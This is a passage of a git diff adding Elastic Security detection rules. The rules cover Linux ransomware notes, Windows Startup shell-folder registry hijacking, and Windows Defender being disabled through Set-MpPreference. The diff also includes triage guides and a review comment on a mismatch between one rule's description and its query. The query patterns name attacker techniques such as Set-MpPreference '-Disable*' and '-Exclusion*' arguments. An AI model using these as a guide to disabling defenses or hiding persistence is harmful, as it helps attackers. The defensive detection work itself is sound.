"https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.004", + "name": "Parent PID Spoofing", + "reference": "https://attack.mitre.org/techniques/T1134/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json new file mode 100644 index 00000000000..ade28495fa8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_8.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Ransomware Note Creation Detected", + "query": "sequence by process.entity_id, host.id with maxspan=1s \n [file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"rename\" and file.extension : \"?*\" \n and process.executable : (\"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/var/run/*\", \"/boot/*\", \"/srv/*\", \"/run/*\") and\n file.path : (\n \"/home/*/Downloads/*\", \"/home/*/Documents/*\", \"/root/*\", \"/bin/*\", \"/usr/bin/*\", \"/var/log/*\", \"/var/lib/log/*\",\n \"/var/backup/*\", \"/var/www/*\") and\n not process.name : (\n \"dpkg\", \"yum\", \"dnf\", \"rpm\", \"dockerd\", \"go\", \"java\", \"pip*\", \"python*\", \"node\", \"containerd\", \"php\", \"p4d\",\n \"conda\", \"chrome\", \"imap\", \"cmake\", \"firefox\", \"semanage\", \"semodule\", \"ansible-galaxy\", \"fc-cache\", \"jammy\", \"git\",\n \"systemsettings\", \"vmis-launcher\", \"bundle\", \"kudu-tserver\", \"suldownloader\"\n )\n ] with runs=25\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.name : (\n \"*crypt*\", \"*restore*\", \"*lock*\", \"*recovery*\", \"*data*\", \"*read*\", \"*instruction*\", \"*how_to*\", \"*ransom*\"\n )\n ]\n", + "related_integrations": [ + { + "package": 
"endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8935a8b-634a-4449-98f7-bb24d3b2c0af", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "c8935a8b-634a-4449-98f7-bb24d3b2c0af_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json new file mode 100644 index 00000000000..7036e4e2d5a --- /dev/null 
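Review bot: The `description` of this rule says the second stage is "the creation of a .txt file with a file name containing ransomware keywords", but the `creation` branch of the `query` only filters `file.name` against `*crypt*`, `*restore*`, `*lock*`, `*data*`, `*read*`, … and never tests `file.extension`, so the text and the query disagree. Either bound the stage with `file.extension : "txt"` as the description promises, or reword the description to "a file whose name contains ransomware keywords"; wildcards such as `*data*` and `*read*` will otherwise match a lot of benign writes, and the `.txt` qualifier is presumably what was meant to limit that. Since this file is an exported rule artifact, the correction belongs in the upstream rule source rather than in this package copy.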
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_109.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Startup Shell Folder Modification", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n 
\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c8b150f0-0164-475b-a75e-74b47800a9ff_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json new file mode 100644 index 00000000000..f3fd82e63b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_110.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Startup Shell Folder Modification", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n 
\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c8b150f0-0164-475b-a75e-74b47800a9ff_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json new file mode 100644 index 00000000000..6853896a759 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings.", + "false_positives": [ + "Planned Windows Defender configuration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Windows Defender Security Settings via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")\n ) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on 
adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json new file mode 100644 index 00000000000..34180933469 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_110.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings.", + "false_positives": [ + "Planned Windows Defender configuration changes." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Windows Defender Security Settings via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine 